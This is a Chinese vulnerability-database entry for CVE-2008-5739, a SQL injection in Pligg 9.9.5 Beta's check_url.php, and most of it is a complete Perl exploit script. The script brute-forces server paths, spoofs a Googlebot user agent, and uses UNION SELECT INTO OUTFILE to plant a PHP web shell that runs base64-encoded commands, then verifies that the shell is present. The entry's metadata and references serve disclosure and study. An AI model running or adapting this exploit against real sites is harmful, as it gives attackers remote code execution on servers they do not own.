Pligg 'check_url.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117110 漏洞类型 SQL注入
发布时间 2008-12-22 更新时间 2009-01-29
CVE编号 CVE-2008-5739 CNNVD-ID CNNVD-200812-463
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7544
https://cxsecurity.com/issue/WLB-2008120200
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-463
|漏洞详情
Pligg是一个Web2.0内容管理系统(CMS)。PliggCMS9.9.5Beta的evb/check_url.php中存在SQL注入漏洞。远程攻击者可以借助url参数,执行任意SQL指令
|漏洞EXP
#!/usr/bin/perl

=about

 Pligg 9.9.5 Beta Perl exploit
 
 AUTHOR
	discovered & written by Ams
	ax330d [doggy] gmail [dot] com

 VULN. DESCRIPTION:
	Vulnerability hides in 'evb/check_url.php'
	unfiltered $_GET['url'] parameter.
	Actually, it has filtration.
	Filtration strips tags and converts html
	special chars , but it is not enough,
	because we can use MySQLs CHAR() function
	to convert shell to allowed chars.
 
 EXPLOIT WORK:
	Firtsly, exploit tryes to get full server
	path, but if not succeeded, then it will brute it.
	If path has been found then exploit will try
	to upload tiny shell via SQl-Injection.
 
 REQUIREMENTS:
	MySQL should be able to write to file.
	Know full server path to portal.
	magiq_quotes_gpc=off
    
=cut

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

Banner();

$| = 1;
my $expl_url  = shift or Usage();
my $serv_path = shift || '';

my $spider = LWP::UserAgent->new;
$spider->timeout( 9 );
$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');

my $def_shell = '/libs/manager.php';
my $shell     = q(<?php @eval(base64_decode($_GET['cmd']));?>);
my $sql_shell = join ',', map { ord } split //, $shell;

my @paths = qw(
	/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts
	/home/www  /home/httpd/vhosts
	/usr/local/apache/htdocs
	/www/htdocs
);

exploit( $expl_url );

sub exploit {
	
	$_ = shift;
	print "\n\tExploiting: $_";
	
	my ( $packet, $rcvd, $injection );
	my ( $prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
	
	my $req = GET "$prot://$host$path/evb/check_url.php";
	my $res = $spider->request( $req );
	$serv_path = $res->content =~ /template\s+in\s+(.*?)config\.php/
		? $1
		: $serv_path;
	
	if ( $serv_path ne '' ) {
		
		print "\n\tFound server path: $serv_path";
		
		chomp( $serv_path );
		$injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$def_shell'--  ";
		$req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection );
		$res = $spider->request( $req );
		
	} else {
		
		print "\n\tUnable to find path, starting bruteforce...\n";
		
		for $serv_path ( @paths ) {
			
			printf "\tTrying: $serv_path$path$def_shell %s\r", '  ' x 10;
			
			chomp( $serv_path );
			$injection = "' UNION SELECT CHAR($sql_shell),'' INTO OUTFILE '$serv_path$path$def_shell'--  ";
			$req = GET "$prot://$host$path/evb/check_url.php?url=" . Url_Encode( $injection );
			$res = $spider->request( $req );
		}
	}
	
	#	Checking for shell presence
	$req = HEAD "http://$host$path$def_shell";
	$res = $spider->request( $req );

	if ( $res->status_line =~ /200/ ) {
		print "\n\tExploited: http://$host$path$def_shell\n\n";
	} else {
		print "\n\tExploiting failed\n\n";
	}
	
}

#	Light wheel...
sub Url_Encode {
	$_ = shift;
	s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
	return $_;
}

sub Usage {
	print "\n\tUsage:\t$0 http://site.com [full server path]
	
	Example:
		$0 http://localhost/ /var/www/htdocs
		$0 http://localhost/\n\n";
	exit;
}

sub Banner {
	print "
	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	  Pligg 9.9.5 Beta Perl exploit
	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
}

# milw0rm.com [2008-12-22]
|参考资料

来源:XF
名称:pligg-checkurl-sql-injection(47571)
链接:http://xforce.iss.net/xforce/xfdb/47571
来源:BID
名称:32970
链接:http://www.securityfocus.com/bid/32970
来源:MILW0RM
名称:7544
链接:http://www.milw0rm.com/exploits/7544
来源:SREASON
名称:4817
链接:http://securityreason.com/securityalert/4817
来源:OSVDB
名称:50913
链接:http://osvdb.org/50913